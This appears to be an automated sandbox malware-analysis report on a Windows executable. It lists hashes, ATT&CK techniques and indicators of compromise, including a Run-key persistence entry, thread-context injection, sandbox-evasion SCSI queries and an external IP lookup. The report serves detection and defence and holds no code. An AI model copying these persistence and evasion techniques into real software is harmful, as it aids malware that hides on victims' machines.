ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b

Analysis

max time kernel
281s
max time network
180s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
08/10/2022, 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
Size

28KB
MD5

4fe29c0e5f183c311dd93fc8c5d9260f
SHA1

d8e138002f99c09c87767715c4dadfc19e825273
SHA256

ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b
SHA512

1e0bb6091903282a94bd0e5581b84c29f8295711f96952b058e215b25c8bbdc47dd54a35b5c5a3c2eb2e1100ca6840586169931dbcd33564ebe69a36229ca918
SSDEEP

768:3MXghTSHqcccccccccccccccABcZei8JgEiy:3MXgh9c4i8J8y

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sxdcwa = "\"C:\\Users\\Admin\\AppData\\Roaming\\Exguxohg\\Sxdcwa.exe\""	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3064 set thread context of 4708	3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe	72
PID 4708 set thread context of 2512	4708	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe	79

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	explorer.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\4032412167\2900507189.pri	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 22 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Modifies registry class 29 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133065238422491118"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e6070a004100720067006a006200650078000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c00000000000000000000000004353151d1dad80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e6070a004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000aa2ba250d1dad80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e60709004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc76000000000000000000000000d137466221bed80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
4708	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	4708	ad439236223a88044845df5898289d39742035f6255d20baae86aa2edde8fa1b.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeDebugPrivilege	2512	cvtres.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe
Token: SeShutdownPrivilege	1972	explorer.exe
Token: SeCreatePagefilePrivilege	1972	explorer.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
1972	explorer.exe
